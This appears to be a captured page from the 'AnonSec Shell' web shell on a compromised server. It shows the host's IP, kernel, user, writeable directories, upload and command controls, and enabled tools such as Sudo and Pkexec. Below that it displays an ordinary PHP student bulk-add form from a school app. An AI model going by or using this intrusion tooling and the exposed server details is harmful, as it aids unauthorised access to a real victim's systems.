AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.217.114
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/school/application/views/backend/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/school/application/views/backend/admin/student_bulk_add_append.php
<div class="row">

	<div class="col-md-2">
		<div class="form-group">
			<input type="text" name="name[]" id="name_<?php echo $total;?>" class="form-control"
				placeholder="<?php echo get_phrase('name');?>">
		</div>
	</div>

	<div class="col-md-2">
		<div class="form_group">
			<select name="parent_id[]" id="parent_id_<?php echo $total;?>" class="form-control selectboxit">
				<option value=""><?php echo get_phrase('parent');?></option>
				<?php
					$parents = $this->db->get('parent')->result_array();
					foreach($parents as $row):
				?>
				<option value="<?php echo $row['parent_id'];?>"><?php echo $row['name'];?></option>
				<?php endforeach;?>
			</select>
		</div>
	</div>

	<div class="col-md-2">
		<div class="form-group">
			<input type="email" name="email[]" id="email_<?php echo $total;?>" class="form-control"
				placeholder="<?php echo get_phrase('email');?>">
		</div>
	</div>

	<div class="col-md-2">
		<div class="form-group">
			<input type="password" name="password[]" id="password_<?php echo $total;?>" class="form-control"
				placeholder="<?php echo get_phrase('password');?>">
		</div>
	</div>

	<div class="col-md-2">
		<div class="form-group">
			<input type="text" name="phone[]" id="phone_<?php echo $total;?>" class="form-control"
				placeholder="<?php echo get_phrase('phone');?>">
		</div>
	</div>

	<div class="col-md-1">
		<div class="form-group">
			<input type="text" name="roll[]" id="roll_<?php echo $total;?>" class="form-control"
				placeholder="<?php echo get_phrase('roll');?>">
		</div>
	</div>

</div>

<script type="text/javascript">
	$(document).ready(function() {
        if($.isFunction($.fn.selectBoxIt))
		{
			$("select.selectboxit").each(function(i, el)
			{
				var $this = $(el),
					opts = {
						showFirstOption: attrDefault($this, 'first-option', true),
						'native': attrDefault($this, 'native', false),
						defaultText: attrDefault($this, 'text', ''),
					};
					
				$this.addClass('visible');
				$this.selectBoxIt(opts);
			});
		}
    });
	
</script>

Anon7 - 2022
AnonSec Team